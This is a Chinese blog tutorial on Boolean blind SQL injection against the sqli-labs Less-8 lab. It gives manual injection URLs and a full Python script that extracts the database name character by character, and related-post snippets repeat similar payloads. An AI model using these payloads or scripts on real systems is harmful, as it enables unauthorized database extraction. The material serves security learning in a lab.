SQL盲注之python脚本自动化注入

已于 2023-12-18 17:55:43 修改
阅读量1.3k 收藏 18
点赞数 15
分类专栏: web安全 文章标签: sql python 网络安全
于 2023-12-18 17:53:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41690468/article/details/135067972
版权

SQL盲注

sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。

手动注入

测试环境

测试环境sql-libs less8中的布尔注入

在这里插入图片描述

手动注入语句

?id=1' and length((select database()))=8--+
/?id=1%27%20and%20ascii(substr((select%20database()),1,1))=115--+

不正确时页面显示内容
在这里插入图片描述

正确时页面显示内容
在这里插入图片描述

在这里插入图片描述

就可以遍历访问url,然后匹配响应包中的内容是否包含You are in等特殊字段。


python脚本自动化注入

需求使用python脚本自动化注入,使用python脚本跑出测试环境中的数据库名称。

分解需求,
首先测试网站是否可以正常访问
其次遍历测试数据库的长度
最后遍历测试数据库名称

测试能否正常访问

url = "http://test.com/Less-8/"
# 按实践的地址
url_template = "http://test.com/Less-8/?id=1' and length((select database()))=8--+"
len = 0
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 '
                 '(KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
# 发送get请求      
response = requests.get(url_template,headers = headers)
# 查看请求状态是否为200
print(response)

遍历测试数据库长度

def GetDBName():
    # 获取数据库的长度
    print("----------测试数据库长度--------------")
    url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"
    for i in range(1, 99):
        current_url = url_template.format(i)
        response = requests.get(current_url, headers=headers)
        if re.search(r'You are in',response.text):
            len = i
            print("数据库长度为:", i)
            break

遍历测试数据库名称

def GetDBName():
    # 获取数据库的长度
    print("----------测试数据库长度--------------")
    url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"
    for i in range(1, 99):
        current_url = url_template.format(i)
        response = requests.get(current_url, headers=headers)
        if re.search(r'You are in',response.text):
            len = i
            print("数据库长度为:", i)
            break

    # 测试数据库名称
    print("----------测试数据库名--------------")
    DBname = ''
    url_template1 = "http://test.com/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),{},1))={}--+"
    for i in range(1, len+1):
        for j in range(33, 127):
            # 拼接构造需要的测试的URL地址,通过format函数批量构造
            current_url1 = url_template1.format(i, j)
#            print(current_url1)

            # 发送请求
            response1 = requests.get(current_url1, headers=headers)

            # 判断是否成功
            if re.search(r'You are in', response1.text):
                DBname += chr(j)
                print("数据库名为:", DBname)
                break

效果图
在这里插入图片描述

跑出数据库名称即可,测试点到为止。

完整代码

# 导入requests发送请求,导入re正则表达式对响应包进行筛选
import re
import requests


# 首先测试一下是否能够正常访问到测试地址
url = "http://test.com"
url_template = "http://test.com/Less-8/?id=1' and length((select database()))=8--+"
len = 0
# DBname = ''
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 '
                 '(KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
response = requests.get(url_template,headers = headers)
print(response)


def GetDBName():
    # 获取数据库的长度
    print("----------测试数据库长度--------------")
    url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"
    for i in range(1, 99):
        current_url = url_template.format(i)
        response = requests.get(current_url, headers=headers)
        if re.search(r'You are in',response.text):
            len = i
            print("数据库长度为:", i)
            break

    # 测试数据库名称
    print("----------测试数据库名--------------")
    DBname = ''
    url_template1 = "http://test.com/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),{},1))={}--+"
    for i in range(1, len+1):
        for j in range(33, 127):
            # 拼接构造需要的测试的URL地址,通过format函数批量构造
            current_url1 = url_template1.format(i, j)
#            print(current_url1)

            # 发送请求
            response1 = requests.get(current_url1, headers=headers)

            # 判断是否成功
            if re.search(r'You are in', response1.text):
                DBname += chr(j)
                print("数据库名为:", DBname)
                break

if __name__ == '__main__':
    GetDBName()

说明

PS:请授权后再测试,禁止未授权进行渗透测试。使用代码默认是接受授权测试。请按照当地法规进行测试。

菜鸡学安全
关注
  • 15
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入自动化python脚本
CMACCKK
08-10 3537
写了一个python3注入sql脚本 临近毕业,尝试写一些自动注入和自动扫描的脚本 发现还是不够自动 后面我再改改。现在脖子疼 实现效果 代码如下: import requests from bs4 import BeautifulSoup from colorama import init, Fore, Back, Style import sys import time import urllib.parse import re from prettytable import PrettyTab
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2164
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
SQL注入盲注(小白的学习)
lgsyydsa的博客
06-04 576
对length列从小到大或者从大到小排列,会发现有一些结果的长度与大部分的长度不同,如果还是不知道可以在下面response的render中会有图显示。所以我们可以通过修改substr中第二个参数来进行判断,但是这样会浪费大量的时间。注意:limit 0,1 表示是第一张表,如果爆出来的表不太像有flag的,可以修改limit 第一个参数,继续爆下一个表名。第一个参数由于不知道表名长度,可以设置为10,第二个参数设置同上,爆破完后将长度进行排序可知表名为flag,这很ctfhub。所以先判断数据库的长度。
2024年Python最全Python自动化sql注入:布尔盲注_布尔盲注脚本
最新发布
2301_82244514的博客
04-30 431
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
sql盲注python脚本
weixin_48266255的博客
08-29 454
【代码】sql盲注python脚本
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 691
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
pythonsql注入步骤_python 打造一个sql注入脚本 (一)
weixin_39809168的博客
11-30 505
0x00前言:昨天刚刚看完小迪老师的sql注入篇的第一章所以有了新的笔记。0x01笔记:sql注入原理:网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作。sql注入对渗透的作用:获取数据sql注入特性:攻击方法由数据库类型决定攻击结果由数据库决定漏洞代码:sql.php当我们在网页执行访问了:http://127.0.0.1/sql.php?x=1在数据库其实是这样的$...
布尔盲注.py_sql盲注python_
10-03
在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,它显然是用于演示或执行SQL盲注的工具。 在SQL盲注中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本自动化这一过程。 SQL注入攻击主要有三种类型:直列注入、延时...
SQL注入之基于布尔的盲注详解
09-10
在实际操作中,由于手动进行布尔型盲注非常耗时,通常会编写自动化脚本来辅助。例如,Python的`requests`库可以用来发送HTTP请求,通过检查响应的长度或内容来判断SQL查询的正确性。这样的脚本会迭代所有可能的字符...
时间盲注python脚本.zip
12-28
在本压缩包"时间盲注python脚本.zip"中,包含两个Python脚本文件:time_sql_post.py和time_sql_get.py,分别用于POST和GET方法实现时间盲注自动化攻击。 首先,我们来详细了解一下时间盲注的基本原理。当服务器执行...
sql注入程序(python2.7+pyqt4.8.5)
03-10
包含程序,还有两个jsp的测试网站(MSSQL、MySQL),程序带有详细的注释。
布尔盲注python脚本.zip
12-28
在给定的压缩包文件"布尔盲注python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔盲注Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔盲注原理**...
写一个布尔盲注脚本
weixin_35752645的博客
01-01 487
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
SQL注入攻击原理与自动化检测技术的深度探究及其实战应用
正在成为 code ape
03-16 1320
本文旨在深入探讨SQL注入攻击的核心原理,并以此为基础,详细阐述其检测手段与防护策略。同时,聚焦于构建一套全面的自动化SQL注入攻击测试系统,通过识别输入接口、验证转义机制、静态与动态分析以及利用智能Payload生成等关键技术,对Web应用的安全性进行深度评估和渗透测试。 在详述SQL注入的各种类型(如布尔型、时间延迟型、联合查询型、堆叠型和子查询型)的基础上,本文将展示如何设计一个包含目标发现与爬取、Payload生成与注入、响应分析与漏洞确认、深度探测与利用以及报告生成与管理五大模块的自动化测试系统
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1611
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
python sql注入脚本_python打造一个分析网站SQL注入脚本
weixin_39546312的博客
02-09 112
1 importrequests,re,time,os2 from tqdm importtqdm3 from bs4 importBeautifulSoup4 defzhuru():5 globalx,headers,ps6 user=input('[+]Please enter the URL you want to test:') #用户输入要检测的网站7 url="...
sql注入:延时注入python万能脚本
一个努力学习网安的小牛马
11-08 260
【代码】sql注入:延时注入python脚本
布尔盲注怎么用,一看你就明白了。布尔盲注原理+步骤+实战教程
热门推荐
wangyuxiang946的博客
03-16 2万+
写给每一个为了让自己变得更好,而坚持努力的你。
sql注入盲注python脚本
04-06
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的操作。而盲注是一种特殊类型的SQL注入攻击,攻击者无法直接获取数据库的具体信息,但可以通过不断尝试不同的条件来判断是否存在漏洞。 下面是一个使用Python编写的简单SQL注入盲注脚本的示例: ```python import requests def check_vulnerable(url): payload = "' OR 1=1 --" response = requests.get(url + "?id=" + payload) if "Welcome" in response.text: return True else: return False def exploit_blind(url): result = "" characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" while True: found = False for char in characters: payload = "' OR SUBSTRING((SELECT database()), 1, 1) = '" + char + "' --" response = requests.get(url + "?id=" + payload) if "Welcome" in response.text: result += char found = True break if not found: break return result # 示例使用方法 url = "http://example.com/vulnerable_page" if check_vulnerable(url): database_name = exploit_blind(url) print("数据库名称:", database_name) else: print("目标网站不易受SQL注入攻击") ``` 上述脚本中,`check_vulnerable`函数用于检测目标网站是否易受SQL注入攻击,它通过在URL中插入特定的payload来判断是否存在漏洞。`exploit_blind`函数用于利用盲注漏洞获取数据库名称,它通过不断尝试不同的字符来逐个获取数据库名称的每个字符。 请注意,上述脚本仅为示例,实际使用时需要根据具体情况进行修改和扩展,同时要遵循法律和道德规范,仅在合法授权的范围内使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值